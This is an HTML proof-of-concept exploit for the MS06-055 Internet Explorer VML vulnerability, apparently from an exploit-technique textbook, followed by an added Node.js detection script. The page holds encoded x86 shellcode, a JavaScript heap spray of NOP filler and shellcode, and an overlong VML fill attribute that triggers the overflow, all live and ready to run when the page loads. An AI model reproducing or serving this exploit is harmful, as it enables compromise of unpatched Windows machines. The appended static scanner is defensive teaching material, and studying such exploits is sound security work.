<!-----------------------------------------------------------------------------------
To be the apostrophe which changed "Impossible" into "I'm possible"!
PoC code for chapter 14.2 of the book "Vulnerability Exploit and Analysis Technique"
file name : MS06-055.html
author : failwest
date : 2007.10.22
description : demonstration of the heap spray technique with MS06-055
Notice : this exploit can be launched on Windows 2000 and Windows XP SP1
systems that have not been patched for MS06-055
this sample code may be detected as a threat by some antivirus products
version : 1.0
E-mail : failwest@gmail.com
For educational purposes only. Enjoy the fun of exploiting :)
--------------------------------------------------------------------------------------->
<html xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<title>failwest</title>
<style>
<!--v\:* { behavior: url(#default#VML); }-->
</style>
</head>
<script language="javascript">
var shellcode="\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u6577\u7473\u6668\u6961\u8b6c\u53c4\u5050\uff53\ufc57\uff53\uf857";
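// Filler: x86 NOP bytes (0x90), doubled until the string exceeds 0x100000/2 characters (1 MB).
var nop="\u9090\u9090";
while (nop.length <= 0x100000/2)
{
    nop += nop;
}
// Trim so that filler + shellcode fit in one 1 MB heap allocation. The byte sizes are
// halved because string length counts 16-bit characters: 32 bytes for the heap block
// header, 4 bytes for the string length prefix, 2 bytes for the null terminator.
nop = nop.substring(0, 0x100000/2 - 32/2 - 4/2 - shellcode.length - 2/2 );
// Heap spray: allocate 200 such blocks, each holding the filler followed by the shellcode.
var slide = new Array();
for (var i=0; i<200; i++)
{
    slide[i] = nop + shellcode;
}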
</script>
<body>
<v:rect style="width:444pt;height:444pt" fillcolor="black">
<v:fill method="ఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌఌ"/>
</v:rect>
</body>
</html>
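<!--
Added example, not part of the original PoC or the book: a static triage check, run under Node.js, for the two patterns this file combines, an overlong attribute on a VML element and a script that grows a string by self-append or carries a long run of \uXXXX escapes. The thresholds, the function name and both sample documents are assumptions; the samples are constructed and inert.

```javascript
// Added example (not from the original file): static triage heuristics.
// Thresholds and names are assumptions chosen for illustration.
const MAX_ATTR_LEN = 256;   // assumed ceiling for a sane VML attribute value
const MIN_ESCAPES = 32;     // assumed run of \uXXXX escapes worth flagging

function scanHtml(html) {
  const findings = [];
  // VML is active if the namespace or the #default#VML behavior is declared.
  const usesVml = /urn:schemas-microsoft-com:vml|#default#VML/i.test(html);

  // Rule 1: any attribute on a <v:...> element longer than the ceiling.
  for (const tag of html.matchAll(/<v:(\w+)\b([^>]*)>/gi)) {
    for (const attr of tag[2].matchAll(/([\w:]+)\s*=\s*"([^"]*)"/g)) {
      if (attr[2].length > MAX_ATTR_LEN) {
        findings.push({
          rule: "vml-long-attribute",
          where: "v:" + tag[1] + "@" + attr[1],
          length: attr[2].length,
          uniform: new Set(attr[2]).size === 1, // one repeated character
        });
      }
    }
  }

  // Rules 2 and 3: spray-style script, judged from the source text only.
  const escapeRun = new RegExp("(?:\\\\u[0-9a-f]{4}){" + MIN_ESCAPES + ",}", "i");
  for (const s of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    if (escapeRun.test(s[1])) findings.push({ rule: "long-escape-string" });
    const dbl = s[1].match(/([A-Za-z_$][\w$]*)\s*\+=\s*\1\b/);
    if (dbl) findings.push({ rule: "self-append-growth", where: dbl[1] });
  }
  return { usesVml, findings, suspicious: usesVml && findings.length > 0 };
}

// Constructed, inert samples: the filler is the letter "A", nothing executes.
const flaggedSample =
  '<html xmlns:v="urn:schemas-microsoft-com:vml"><script>' +
  'var pad="' + "\\u0041".repeat(40) + '"; while (pad.length < 64) { pad+=pad; }' +
  '</script><body><v:rect fillcolor="black">' +
  '<v:fill method="' + "A".repeat(300) + '"/></v:rect></body></html>';
const benignSample =
  '<html xmlns:v="urn:schemas-microsoft-com:vml"><body>' +
  '<v:rect style="width:10pt;height:10pt" fillcolor="black">' +
  '<v:fill method="linear"/></v:rect></body></html>';

console.log(JSON.stringify(scanHtml(flaggedSample), null, 2));
console.log(scanHtml(benignSample).suspicious);
```
-->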